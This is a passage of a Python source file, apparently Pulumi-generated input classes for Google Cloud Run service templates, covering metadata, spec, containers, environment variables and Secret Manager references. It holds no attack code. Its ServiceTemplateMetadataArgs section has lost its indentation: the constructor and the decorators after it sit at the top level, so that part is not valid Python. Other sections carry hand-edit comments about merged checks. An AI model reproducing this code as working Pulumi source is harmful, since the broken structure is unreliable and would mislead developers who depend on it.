    def spec(self) -> Optional[pulumi.Input['ServiceTemplateSpecArgs']]:
        """
        RevisionSpec holds the desired state of the Revision (from the client).
        Structure is documented below.
        """
        return pulumi.get(self, "spec")

    @spec.setter
    def spec(self, value: Optional[pulumi.Input['ServiceTemplateSpecArgs']]):
        pulumi.set(self, "spec", value)
@pulumi.input_type
class ServiceTemplateMetadataArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
generation: Optional[pulumi.Input[int]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
resource_version: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
uid: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations is a key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata. More
info: http://kubernetes.io/docs/user-guide/annotations
**Note**: The Cloud Run API may add additional annotations that were not provided in your config.
If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
Cloud Run (fully managed) uses the following annotation keys to configure features on a Service:
- `run.googleapis.com/ingress` sets the [ingress settings](https://cloud.google.com/sdk/gcloud/reference/run/deploy#--ingress)
for the Service. For example, `"run.googleapis.com/ingress" = "all"`.
:param pulumi.Input[int] generation: -
A sequence number representing a specific generation of the desired state.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and routes.
More info: http://kubernetes.io/docs/user-guide/labels
:param pulumi.Input[str] name: Volume's name.
:param pulumi.Input[str] namespace: In Cloud Run the namespace must be equal to either the
project ID or project number.
:param pulumi.Input[str] resource_version: -
An opaque value that represents the internal version of this object that
can be used by clients to determine when objects have changed. May be used
for optimistic concurrency, change detection, and the watch operation on a
resource or set of resources. They may only be valid for a
particular resource or set of resources.
More info:
https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param pulumi.Input[str] self_link: -
SelfLink is a URL representing this object.
:param pulumi.Input[str] uid: -
UID is a unique id generated by the server on successful creation of a resource and is not
allowed to change on PUT operations.
More info: http://kubernetes.io/docs/user-guide/identifiers#uids
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if generation is not None:
pulumi.set(__self__, "generation", generation)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations is a key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata. More
info: http://kubernetes.io/docs/user-guide/annotations
**Note**: The Cloud Run API may add additional annotations that were not provided in your config.
If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
Cloud Run (fully managed) uses the following annotation keys to configure features on a Service:
- `run.googleapis.com/ingress` sets the [ingress settings](https://cloud.google.com/sdk/gcloud/reference/run/deploy#--ingress)
for the Service. For example, `"run.googleapis.com/ingress" = "all"`.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def generation(self) -> Optional[pulumi.Input[int]]:
"""
-
A sequence number representing a specific generation of the desired state.
"""
return pulumi.get(self, "generation")
@generation.setter
def generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "generation", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and routes.
More info: http://kubernetes.io/docs/user-guide/labels
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
    """
    Volume's name.
    """
    stored_name = pulumi.get(self, "name")
    return stored_name

@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
    # Store the new name.
    pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
    """
    In Cloud Run the namespace must equal either the project ID or the
    project number.
    """
    ns = pulumi.get(self, "namespace")
    return ns

@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
    # Store the new namespace.
    pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[pulumi.Input[str]]:
    """
    -
    An opaque value representing the internal version of this object that
    clients can use to determine when objects have changed. May be used for
    optimistic concurrency, change detection, and the watch operation on a
    resource or set of resources. Only guaranteed valid for a particular
    resource or set of resources.
    More info:
    https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
    """
    version = pulumi.get(self, "resource_version")
    return version

@resource_version.setter
def resource_version(self, value: Optional[pulumi.Input[str]]):
    # Overwrite the stored opaque version token.
    pulumi.set(self, "resource_version", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
    """
    -
    SelfLink is a URL representing this object.
    """
    link = pulumi.get(self, "self_link")
    return link

@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
    # Overwrite the stored self link URL.
    pulumi.set(self, "self_link", value)
@property
@pulumi.getter
def uid(self) -> Optional[pulumi.Input[str]]:
    """
    -
    UID is a unique id generated by the server on successful creation of a
    resource; it is not allowed to change on PUT operations.
    More info: http://kubernetes.io/docs/user-guide/identifiers#uids
    """
    unique_id = pulumi.get(self, "uid")
    return unique_id

@uid.setter
def uid(self, value: Optional[pulumi.Input[str]]):
    # Overwrite the stored server-generated UID.
    pulumi.set(self, "uid", value)
@pulumi.input_type
class ServiceTemplateSpecArgs:
    def __init__(__self__, *,
                 container_concurrency: Optional[pulumi.Input[int]] = None,
                 containers: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerArgs']]]] = None,
                 service_account_name: Optional[pulumi.Input[str]] = None,
                 serving_state: Optional[pulumi.Input[str]] = None,
                 timeout_seconds: Optional[pulumi.Input[int]] = None,
                 volumes: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeArgs']]]] = None):
        """
        :param pulumi.Input[int] container_concurrency: ContainerConcurrency specifies the maximum allowed in-flight (concurrent)
               requests per container of the Revision. Values are:
        :param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerArgs']]] containers: Container defines the unit of execution for this Revision.
               In the context of a Revision, we disallow a number of the fields of
               this Container, including: name, ports, and volumeMounts.
               The runtime contract is documented here:
               https://github.com/knative/serving/blob/master/docs/runtime-contract.md
               Structure is documented below.
        :param pulumi.Input[str] service_account_name: Email address of the IAM service account associated with the revision of the
               service. The service account represents the identity of the running revision,
               and determines what permissions the revision has. If not provided, the revision
               will use the project's default service account.
        :param pulumi.Input[str] serving_state: -
               ServingState holds a value describing the state the resources
               are in for this Revision.
               It is expected
               that the system will manipulate this based on routability and load.
        :param pulumi.Input[int] timeout_seconds: TimeoutSeconds holds the max duration the instance is allowed for responding to a request.
        :param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeArgs']]] volumes: Volume represents a named volume in a container.
               Structure is documented below.
        """
        if container_concurrency is not None:
            pulumi.set(__self__, "container_concurrency", container_concurrency)
        if containers is not None:
            pulumi.set(__self__, "containers", containers)
        if service_account_name is not None:
            pulumi.set(__self__, "service_account_name", service_account_name)
        if serving_state is not None:
            # Deprecated field: warn, but still store the supplied value for
            # backward compatibility. (Merged two consecutive identical
            # `is not None` checks into one.)
            warnings.warn("""Not supported by Cloud Run fully managed""", DeprecationWarning)
            pulumi.log.warn("""serving_state is deprecated: Not supported by Cloud Run fully managed""")
            pulumi.set(__self__, "serving_state", serving_state)
        if timeout_seconds is not None:
            pulumi.set(__self__, "timeout_seconds", timeout_seconds)
        if volumes is not None:
            pulumi.set(__self__, "volumes", volumes)

    @property
    @pulumi.getter(name="containerConcurrency")
    def container_concurrency(self) -> Optional[pulumi.Input[int]]:
        """
        ContainerConcurrency specifies the maximum allowed in-flight (concurrent)
        requests per container of the Revision. Values are:
        """
        return pulumi.get(self, "container_concurrency")

    @container_concurrency.setter
    def container_concurrency(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "container_concurrency", value)

    @property
    @pulumi.getter
    def containers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerArgs']]]]:
        """
        Container defines the unit of execution for this Revision.
        In the context of a Revision, we disallow a number of the fields of
        this Container, including: name, ports, and volumeMounts.
        The runtime contract is documented here:
        https://github.com/knative/serving/blob/master/docs/runtime-contract.md
        Structure is documented below.
        """
        return pulumi.get(self, "containers")

    @containers.setter
    def containers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerArgs']]]]):
        pulumi.set(self, "containers", value)

    @property
    @pulumi.getter(name="serviceAccountName")
    def service_account_name(self) -> Optional[pulumi.Input[str]]:
        """
        Email address of the IAM service account associated with the revision of the
        service. The service account represents the identity of the running revision,
        and determines what permissions the revision has. If not provided, the revision
        will use the project's default service account.
        """
        return pulumi.get(self, "service_account_name")

    @service_account_name.setter
    def service_account_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_account_name", value)

    @property
    @pulumi.getter(name="servingState")
    def serving_state(self) -> Optional[pulumi.Input[str]]:
        """
        -
        ServingState holds a value describing the state the resources
        are in for this Revision.
        It is expected
        that the system will manipulate this based on routability and load.
        """
        return pulumi.get(self, "serving_state")

    @serving_state.setter
    def serving_state(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "serving_state", value)

    @property
    @pulumi.getter(name="timeoutSeconds")
    def timeout_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        TimeoutSeconds holds the max duration the instance is allowed for responding to a request.
        """
        return pulumi.get(self, "timeout_seconds")

    @timeout_seconds.setter
    def timeout_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "timeout_seconds", value)

    @property
    @pulumi.getter
    def volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeArgs']]]]:
        """
        Volume represents a named volume in a container.
        Structure is documented below.
        """
        return pulumi.get(self, "volumes")

    @volumes.setter
    def volumes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeArgs']]]]):
        pulumi.set(self, "volumes", value)
@pulumi.input_type
class ServiceTemplateSpecContainerArgs:
    def __init__(__self__, *,
                 image: pulumi.Input[str],
                 args: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 commands: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 env_froms: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvFromArgs']]]] = None,
                 envs: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvArgs']]]] = None,
                 ports: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerPortArgs']]]] = None,
                 resources: Optional[pulumi.Input['ServiceTemplateSpecContainerResourcesArgs']] = None,
                 volume_mounts: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerVolumeMountArgs']]]] = None,
                 working_dir: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] image: Docker image name. This is most often a reference to a container located
               in the container registry, such as gcr.io/cloudrun/hello
               More info: https://kubernetes.io/docs/concepts/containers/images
        :param pulumi.Input[Sequence[pulumi.Input[str]]] args: Arguments to the entrypoint.
               The docker image's CMD is used if this is not provided.
               Variable references $(VAR_NAME) are expanded using the container's
               environment. If a variable cannot be resolved, the reference in the input
               string will be unchanged. The $(VAR_NAME) syntax can be escaped with a
               double $$, ie: $$(VAR_NAME). Escaped references will never be expanded,
               regardless of whether the variable exists or not.
               More info:
               https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell
        :param pulumi.Input[Sequence[pulumi.Input[str]]] commands: Entrypoint array. Not executed within a shell.
               The docker image's ENTRYPOINT is used if this is not provided.
               Variable references $(VAR_NAME) are expanded using the container's
               environment. If a variable cannot be resolved, the reference in the input
               string will be unchanged. The $(VAR_NAME) syntax can be escaped with a
               double $$, ie: $$(VAR_NAME). Escaped references will never be expanded,
               regardless of whether the variable exists or not.
               More info:
               https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell
        :param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvFromArgs']]] env_froms: -
               (Optional, Deprecated)
               List of sources to populate environment variables in the container.
               All invalid keys will be reported as an event when the container is starting.
               When a key exists in multiple sources, the value associated with the last source will
               take precedence. Values defined by an Env with a duplicate key will take
               precedence.
               Structure is documented below.
        :param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvArgs']]] envs: List of environment variables to set in the container.
               Structure is documented below.
        :param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerPortArgs']]] ports: List of open ports in the container.
               More Info:
               https://cloud.google.com/run/docs/reference/rest/v1/RevisionSpec#ContainerPort
               Structure is documented below.
        :param pulumi.Input['ServiceTemplateSpecContainerResourcesArgs'] resources: Compute Resources required by this container. Used to set values such as max memory
               More info:
               https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/#requests-and-limits
               Structure is documented below.
        :param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerVolumeMountArgs']]] volume_mounts: Volume to mount into the container's filesystem.
               Only supports SecretVolumeSources.
               Structure is documented below.
        :param pulumi.Input[str] working_dir: -
               (Optional, Deprecated)
               Container's working directory.
               If not specified, the container runtime's default will be used, which
               might be configured in the container image.
        """
        pulumi.set(__self__, "image", image)
        if args is not None:
            pulumi.set(__self__, "args", args)
        if commands is not None:
            pulumi.set(__self__, "commands", commands)
        if env_froms is not None:
            # Deprecated field: warn, but still store the supplied value for
            # backward compatibility. (Merged two consecutive identical
            # `is not None` checks into one.)
            warnings.warn("""Not supported by Cloud Run fully managed""", DeprecationWarning)
            pulumi.log.warn("""env_froms is deprecated: Not supported by Cloud Run fully managed""")
            pulumi.set(__self__, "env_froms", env_froms)
        if envs is not None:
            pulumi.set(__self__, "envs", envs)
        if ports is not None:
            pulumi.set(__self__, "ports", ports)
        if resources is not None:
            pulumi.set(__self__, "resources", resources)
        if volume_mounts is not None:
            pulumi.set(__self__, "volume_mounts", volume_mounts)
        if working_dir is not None:
            # Deprecated field: warn, but still store the supplied value.
            warnings.warn("""Not supported by Cloud Run fully managed""", DeprecationWarning)
            pulumi.log.warn("""working_dir is deprecated: Not supported by Cloud Run fully managed""")
            pulumi.set(__self__, "working_dir", working_dir)

    @property
    @pulumi.getter
    def image(self) -> pulumi.Input[str]:
        """
        Docker image name. This is most often a reference to a container located
        in the container registry, such as gcr.io/cloudrun/hello
        More info: https://kubernetes.io/docs/concepts/containers/images
        """
        return pulumi.get(self, "image")

    @image.setter
    def image(self, value: pulumi.Input[str]):
        pulumi.set(self, "image", value)

    @property
    @pulumi.getter
    def args(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Arguments to the entrypoint.
        The docker image's CMD is used if this is not provided.
        Variable references $(VAR_NAME) are expanded using the container's
        environment. If a variable cannot be resolved, the reference in the input
        string will be unchanged. The $(VAR_NAME) syntax can be escaped with a
        double $$, ie: $$(VAR_NAME). Escaped references will never be expanded,
        regardless of whether the variable exists or not.
        More info:
        https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell
        """
        return pulumi.get(self, "args")

    @args.setter
    def args(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "args", value)

    @property
    @pulumi.getter
    def commands(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Entrypoint array. Not executed within a shell.
        The docker image's ENTRYPOINT is used if this is not provided.
        Variable references $(VAR_NAME) are expanded using the container's
        environment. If a variable cannot be resolved, the reference in the input
        string will be unchanged. The $(VAR_NAME) syntax can be escaped with a
        double $$, ie: $$(VAR_NAME). Escaped references will never be expanded,
        regardless of whether the variable exists or not.
        More info:
        https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell
        """
        return pulumi.get(self, "commands")

    @commands.setter
    def commands(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "commands", value)

    @property
    @pulumi.getter(name="envFroms")
    def env_froms(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvFromArgs']]]]:
        """
        -
        (Optional, Deprecated)
        List of sources to populate environment variables in the container.
        All invalid keys will be reported as an event when the container is starting.
        When a key exists in multiple sources, the value associated with the last source will
        take precedence. Values defined by an Env with a duplicate key will take
        precedence.
        Structure is documented below.
        """
        return pulumi.get(self, "env_froms")

    @env_froms.setter
    def env_froms(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvFromArgs']]]]):
        pulumi.set(self, "env_froms", value)

    @property
    @pulumi.getter
    def envs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvArgs']]]]:
        """
        List of environment variables to set in the container.
        Structure is documented below.
        """
        return pulumi.get(self, "envs")

    @envs.setter
    def envs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvArgs']]]]):
        pulumi.set(self, "envs", value)

    @property
    @pulumi.getter
    def ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerPortArgs']]]]:
        """
        List of open ports in the container.
        More Info:
        https://cloud.google.com/run/docs/reference/rest/v1/RevisionSpec#ContainerPort
        Structure is documented below.
        """
        return pulumi.get(self, "ports")

    @ports.setter
    def ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerPortArgs']]]]):
        pulumi.set(self, "ports", value)

    @property
    @pulumi.getter
    def resources(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerResourcesArgs']]:
        """
        Compute Resources required by this container. Used to set values such as max memory
        More info:
        https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/#requests-and-limits
        Structure is documented below.
        """
        return pulumi.get(self, "resources")

    @resources.setter
    def resources(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerResourcesArgs']]):
        pulumi.set(self, "resources", value)

    @property
    @pulumi.getter(name="volumeMounts")
    def volume_mounts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerVolumeMountArgs']]]]:
        """
        Volume to mount into the container's filesystem.
        Only supports SecretVolumeSources.
        Structure is documented below.
        """
        return pulumi.get(self, "volume_mounts")

    @volume_mounts.setter
    def volume_mounts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerVolumeMountArgs']]]]):
        pulumi.set(self, "volume_mounts", value)

    @property
    @pulumi.getter(name="workingDir")
    def working_dir(self) -> Optional[pulumi.Input[str]]:
        """
        -
        (Optional, Deprecated)
        Container's working directory.
        If not specified, the container runtime's default will be used, which
        might be configured in the container image.
        """
        return pulumi.get(self, "working_dir")

    @working_dir.setter
    def working_dir(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "working_dir", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvArgs:
    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None,
                 value_from: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvValueFromArgs']] = None):
        """
        :param pulumi.Input[str] name: Volume's name.
        :param pulumi.Input[str] value: Variable references $(VAR_NAME) are expanded
               using the previous defined environment variables in the container and
               any route environment variables. If a variable cannot be resolved,
               the reference in the input string will be unchanged. The $(VAR_NAME)
               syntax can be escaped with a double $$, ie: $$(VAR_NAME). Escaped
               references will never be expanded, regardless of whether the variable
               exists or not.
               Defaults to "".
        :param pulumi.Input['ServiceTemplateSpecContainerEnvValueFromArgs'] value_from: Source for the environment variable's value. Only supports secret_key_ref.
               Structure is documented below.
        """
        # Record only the arguments that were explicitly supplied.
        supplied = (("name", name), ("value", value), ("value_from", value_from))
        for attr, arg in supplied:
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Volume's name.
        """
        stored = pulumi.get(self, "name")
        return stored

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        Variable references $(VAR_NAME) are expanded
        using the previous defined environment variables in the container and
        any route environment variables. If a variable cannot be resolved,
        the reference in the input string will be unchanged. The $(VAR_NAME)
        syntax can be escaped with a double $$, ie: $$(VAR_NAME). Escaped
        references will never be expanded, regardless of whether the variable
        exists or not.
        Defaults to "".
        """
        stored = pulumi.get(self, "value")
        return stored

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)

    @property
    @pulumi.getter(name="valueFrom")
    def value_from(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvValueFromArgs']]:
        """
        Source for the environment variable's value. Only supports secret_key_ref.
        Structure is documented below.
        """
        stored = pulumi.get(self, "value_from")
        return stored

    @value_from.setter
    def value_from(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvValueFromArgs']]):
        pulumi.set(self, "value_from", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromArgs:
    def __init__(__self__, *,
                 config_map_ref: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefArgs']] = None,
                 prefix: Optional[pulumi.Input[str]] = None,
                 secret_ref: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefArgs']] = None):
        """
        :param pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefArgs'] config_map_ref: The ConfigMap to select from.
               Structure is documented below.
        :param pulumi.Input[str] prefix: An optional identifier to prepend to each key in the ConfigMap.
        :param pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefArgs'] secret_ref: The Secret to select from.
               Structure is documented below.
        """
        # Record only the arguments that were explicitly supplied.
        for attr, arg in (("config_map_ref", config_map_ref),
                          ("prefix", prefix),
                          ("secret_ref", secret_ref)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="configMapRef")
    def config_map_ref(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefArgs']]:
        """
        The ConfigMap to select from.
        Structure is documented below.
        """
        stored = pulumi.get(self, "config_map_ref")
        return stored

    @config_map_ref.setter
    def config_map_ref(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefArgs']]):
        pulumi.set(self, "config_map_ref", value)

    @property
    @pulumi.getter
    def prefix(self) -> Optional[pulumi.Input[str]]:
        """
        An optional identifier to prepend to each key in the ConfigMap.
        """
        stored = pulumi.get(self, "prefix")
        return stored

    @prefix.setter
    def prefix(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "prefix", value)

    @property
    @pulumi.getter(name="secretRef")
    def secret_ref(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefArgs']]:
        """
        The Secret to select from.
        Structure is documented below.
        """
        stored = pulumi.get(self, "secret_ref")
        return stored

    @secret_ref.setter
    def secret_ref(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefArgs']]):
        pulumi.set(self, "secret_ref", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromConfigMapRefArgs:
    def __init__(__self__, *,
                 local_object_reference: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs']] = None,
                 optional: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs'] local_object_reference: The Secret to select from.
               Structure is documented below.
        :param pulumi.Input[bool] optional: Specify whether the Secret must be defined
        """
        # Record only the arguments that were explicitly supplied.
        for attr, arg in (("local_object_reference", local_object_reference),
                          ("optional", optional)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="localObjectReference")
    def local_object_reference(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs']]:
        """
        The Secret to select from.
        Structure is documented below.
        """
        stored = pulumi.get(self, "local_object_reference")
        return stored

    @local_object_reference.setter
    def local_object_reference(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs']]):
        pulumi.set(self, "local_object_reference", value)

    @property
    @pulumi.getter
    def optional(self) -> Optional[pulumi.Input[bool]]:
        """
        Specify whether the Secret must be defined
        """
        stored = pulumi.get(self, "optional")
        return stored

    @optional.setter
    def optional(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "optional", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] name: Volume's name.
        """
        # `name` is required, so it is always recorded.
        pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Volume's name.
        """
        stored = pulumi.get(self, "name")
        return stored

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromSecretRefArgs:
    def __init__(__self__, *,
                 local_object_reference: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs']] = None,
                 optional: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs'] local_object_reference: The Secret to select from.
               Structure is documented below.
        :param pulumi.Input[bool] optional: Specify whether the Secret must be defined
        """
        # Record only the arguments that were explicitly supplied.
        for attr, arg in (("local_object_reference", local_object_reference),
                          ("optional", optional)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="localObjectReference")
    def local_object_reference(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs']]:
        """
        The Secret to select from.
        Structure is documented below.
        """
        stored = pulumi.get(self, "local_object_reference")
        return stored

    @local_object_reference.setter
    def local_object_reference(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs']]):
        pulumi.set(self, "local_object_reference", value)

    @property
    @pulumi.getter
    def optional(self) -> Optional[pulumi.Input[bool]]:
        """
        Specify whether the Secret must be defined
        """
        stored = pulumi.get(self, "optional")
        return stored

    @optional.setter
    def optional(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "optional", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] name: Volume's name.
        """
        # `name` is required, so it is always recorded.
        pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Volume's name.
        """
        stored = pulumi.get(self, "name")
        return stored

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvValueFromArgs:
    def __init__(__self__, *,
                 secret_key_ref: pulumi.Input['ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs']):
        """
        :param pulumi.Input['ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs'] secret_key_ref: Selects a key (version) of a secret in Secret Manager.
               Structure is documented below.
        """
        # `secret_key_ref` is required, so it is always recorded.
        pulumi.set(__self__, "secret_key_ref", secret_key_ref)

    @property
    @pulumi.getter(name="secretKeyRef")
    def secret_key_ref(self) -> pulumi.Input['ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs']:
        """
        Selects a key (version) of a secret in Secret Manager.
        Structure is documented below.
        """
        stored = pulumi.get(self, "secret_key_ref")
        return stored

    @secret_key_ref.setter
    def secret_key_ref(self, value: pulumi.Input['ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs']):
        pulumi.set(self, "secret_key_ref", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs:
    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] key: The Cloud Secret Manager secret version.
               Can be 'latest' for the latest value or an integer for a specific version.
        :param pulumi.Input[str] name: Volume's name.
        """
        # Both fields are required, so both are always recorded.
        for attr, arg in (("key", key), ("name", name)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """
        The Cloud Secret Manager secret version.
        Can be 'latest' for the latest value or an integer for a specific version.
        """
        stored = pulumi.get(self, "key")
        return stored

    @key.setter
